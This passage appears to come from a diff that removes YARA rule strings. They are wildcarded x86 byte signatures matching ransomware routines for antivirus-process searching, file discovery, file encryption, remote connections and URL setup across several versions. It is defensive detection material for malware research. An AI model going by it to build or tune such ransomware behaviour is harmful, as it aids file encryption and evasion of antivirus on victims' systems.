-            D6 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 45 ?? 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? 8B C7 5F
-            5E 5B 8B E5 5D C3
-        }
-		$search_antivirus_processes_v4_1_2 = {
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B F8 53 6A ??
-            89 7D ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 89 1E 83 FF ?? 74 ?? 56 57 FF 15 ?? ??
-            ?? ?? 33 DB 8D 7E ?? 57 FF B4 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 76 ??
-            50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 43 83 FB ?? 72 ?? 8B 7D ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 85
-            F6 74 ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5
-            5D C3
-        }
-		$find_files_v4_1_2 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
-            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
-            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
-            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 FF 15 ??
-            ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ??
-            8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? F6
-            44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ??
-            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ??
-            ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 59
-            8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B C7 5F 5E
-            5B 8B E5 5D C3
-        }
-		$crypt_files_v4_1_2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 89 4D ?? 33 DB 57 B9 ?? ?? ?? ?? 89 5D ?? 8B F2 E8
-            ?? ?? ?? ?? 8B F8 8D 55 ?? 56 57 8D 4D ?? 89 7D ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 84
-            ?? ?? ?? ?? 53 53 6A ?? 53 53 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE
-            ?? 0F 84 ?? ?? ?? ?? 6A ?? 58 88 5D ?? 48 75 ?? 51 51 8D 55 ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 89 45 ?? B9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 89 5D ?? 89
-            5D ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 5D ?? 53 8D
-            45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D
-            ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 45 ?? 81 F9 ?? ?? ?? ?? 6A ?? 5A 0F 42 C2 01 8F ?? ??
-            ?? ?? 8B 55 ?? 8D 8D ?? ?? ?? ?? 11 9F ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 FF 75 ?? 89
-            45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 53 52 50 56 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75 ?? FF 75 ?? 56 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75 ?? 57 56 FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 8B 7D ?? 8B 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 53 8D 45 ?? 50 68
-            ?? ?? ?? ?? 57 56 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B D8 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ??
-            ?? ?? 56 FF 15 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3 33 C0 8D
-            48 ?? 89 4D ?? EB
-        }
-		$remote_connection_v4_1_2 = {
-            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
-            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
-            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
-            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
-            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
-            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 47 EB ?? FF
-            15 ?? ?? ?? ?? 8B 45 ?? 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B
-            E5 5D C2
-        }
-		$url_parameters_setup_v4_1_2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 15 ?? ?? ?? ?? 33 FF 57 57 57 FF 15 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 57 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ??
-            ?? ?? ?? 83 EC ?? 33 DB 43 53 83 EC ?? 53 51 53 51 53 51 53 51 53 83 EC ?? 53 51 53
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ?? 50 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
-            D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ??
-            ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 FF 35 ?? ?? ??
-            ?? 8B 35 ?? ?? ?? ?? FF D6 FF 35 ?? ?? ?? ?? 03 C0 A3 ?? ?? ?? ?? FF D6 03 C0 8B D0
-            E8 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 57 57 57 68 ?? ?? ?? ?? 57 57 FF 15 ?? ?? ?? ??
-            8B 35 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6 BB ?? ?? ?? ?? 53
-            FF D6 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ??
-            FF D6 E8 ?? ?? ?? ?? 85 FF 74 ?? 6A ?? 57 FF 15 ?? ?? ?? ?? E8
-        }
-		$url_parameters_setup_v4 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 6A ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 FF
-            15 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 6A ?? FF 15 ??
-            ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF
-            35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ??
-            ?? FF D6 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 C0 8B D0 E8 ?? ?? ?? ?? 6A ?? FF 15
-            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6 68 ?? ?? ??
-            ?? FF D6 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6
-            68 ?? ?? ?? ?? FF D6 E8 ?? ?? ?? ?? E8
-        }
-		$search_antivirus_processes_v4 = {
-            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? FF D6 8B 5D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 03 C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? FF D6 8B F8 89 7D ?? 85 FF 74 ?? 6A ?? 6A ?? C7 07 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 5F 5E
-            33 C0 5B 8B E5 5D C2 ?? ?? 33 C9 33 F6 57 50 89 4D ?? 89 4D ?? 89 4D ?? 89 75 ?? FF
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 49 ?? 85 F6 0F 85 ?? ?? ?? ?? 83 C7 ?? EB
-            ?? 8D 49 ?? 57 FF 74 B5 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 46 83 FE ?? 72 ?? 8B 75 ??
-            EB ?? 83 7D ?? ?? 57 FF 33 C7 45 ?? ?? ?? ?? ?? 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 33 FF 15 ?? ?? ?? ?? EB ?? 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 33 FF D6
-            FF 45 ?? 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 75 ?? 8D 0C 41 B8 ?? ?? ?? ?? 81 F9 ?? ??
-            ?? ?? 89 4D ?? 0F 47 F0 89 75 ?? 8B 7D ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 03 66 83 38 ?? 74
-            ?? 50 FF 15 ?? ?? ?? ?? 8B 0B 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D ?? 89 08 8B 35 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 7D ?? 85 FF 75
-            ?? 68 ?? ?? ?? ?? 57 FF 33 FF D6 8B C7 5F 5E 5B 8B E5 5D C2
-        }
-		$find_files_v4 = {
-            C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 0F 84 ?? ?? ??
-            ?? 8D 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 89 44 24
-            ?? 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 04
-            46 89 44 24 ?? FF D7 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24
-            ?? 66 89 11 83 F8 ?? 75 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B
-            E5 5D C3 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF D7 F6
-            44 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74
-            ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56
-            FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 53 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 83
-            C4 ?? 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E
-            33 C0 5B 8B E5 5D C3
-        }
-		$crypt_files_v4 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 68 ?? ?? ?? ?? 33 DB 89 4D ?? 68 ?? ?? ??
-            ?? 53 8B F2 89 5D ?? FF 15 ?? ?? ?? ?? 8B F8 8D 55 ?? 56 57 8D 4D ?? 89 7D ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B
-            8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
-            8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 88 5D ?? 48 75 ?? 8B 45 ?? 89 85 ??
-            ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B
-            45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 68
-            ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 5D ?? 89 5D ?? 8B 1D ?? ?? ?? ?? 6A ?? C7 05 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? FF D3 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            89 45 ?? FF D3 33 C9 8B D8 89 4D ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? 56 FF
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 3D
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 0F 42 CA 01 87 ?? ?? ?? ?? 8B 55 ?? 83 97 ?? ?? ?? ?? ??
-            8B 7D ?? 89 4D ?? 8D 8D ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B C7 F7 D8 99 6A
-            ?? 6A ?? 52 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50
-            57 53 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57
-            53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 8B 7D ?? 85 C9 0F 84 ?? ?? ?? ?? 6A ??
-            8D 45 ?? 50 68 ?? ?? ?? ?? 57 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? 89
-            45 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
-            ?? 8B 5D ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3
-        }
-		$crypt_files_v3 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45
-            ?? ?? ?? ?? ?? 50 6A ?? 8B D9 8B CA 6A ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 8B F8 C7 45 ?? ?? ?? ?? ?? 53 57 89 7D ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ??
-            ?? ?? 66 0F 6F 05 ?? ?? ?? ?? BA ?? ?? ?? ?? F3 0F 7F 85 ?? ?? ?? ?? 51 66 0F 6F 05
-            ?? ?? ?? ?? 8D 4D ?? F3 0F 7F 45 ?? C6 45 ?? ?? 66 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45
-            ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 F3 0F 6F 85 ?? ?? ?? ?? 8B F8 6A ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? F3 0F 7F 07 6A ?? F3 0F 6F 45 ?? 89 7D ?? F3 0F 7F 47 ?? FF D6
-            F3 0F 6F 45 ?? 68 ?? ?? ?? ?? 89 45 ?? F3 0F 7F 00 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50
-            57 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? EB ?? 68 ??
-            ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            FF 15 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 8B 75 ?? 8B 5D ?? E9 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ??
-            ?? 6A ?? FF 75 ?? FF D7 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 0F 57 C0 66 0F 13 45 ??
-            8B 75 ?? 8B 5D ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D6 6A ?? 8B D8
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? C7 03 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF D6 8B
-            3D ?? ?? ?? ?? 33 F6 33 C9 89 45 ?? 89 4D ?? EB ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 68 ??
-            ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84
-            ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            0F 42 F1 01 03 83 53 ?? ?? 8B 45 ?? 89 45 ?? 89 45 ?? A8 ?? 74 ?? 8B FF 40 A8 ?? 75
-            ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF 75 ?? 89 45 ?? FF 75
-            ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8D 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 4D ?? 8B 45 ??
-            F7 D9 6A ?? 83 D0 ?? 6A ?? F7 D8 50 51 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15
-            ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? BE ?? ?? ?? ?? 89 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 85 F6 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 4D ?? 8B 75 ?? 85 C9 75 ?? 51 8D 45 ?? 50
-            68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75
-            ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ??
-            ?? ?? ?? 8B 03 8B 73 ?? 68 ?? ?? ?? ?? 6A ?? 53 89 45 ?? FF D7 68 ?? ?? ?? ?? 6A ??
-            FF 75 ?? FF D7 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 5D ?? 68 ?? ?? ?? ?? 6A ?? FF
-            75 ?? FF D7 5F 8B D6 8B C3 5E 5B 8B E5 5D C3
-        }
-		$search_antivirus_processes_v5 = {
-            8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF
-            D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB ?? 56 33 C9 89
-            5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F
-            85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D 58 ?? 8D 46 ??
-            50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 37 FF 15
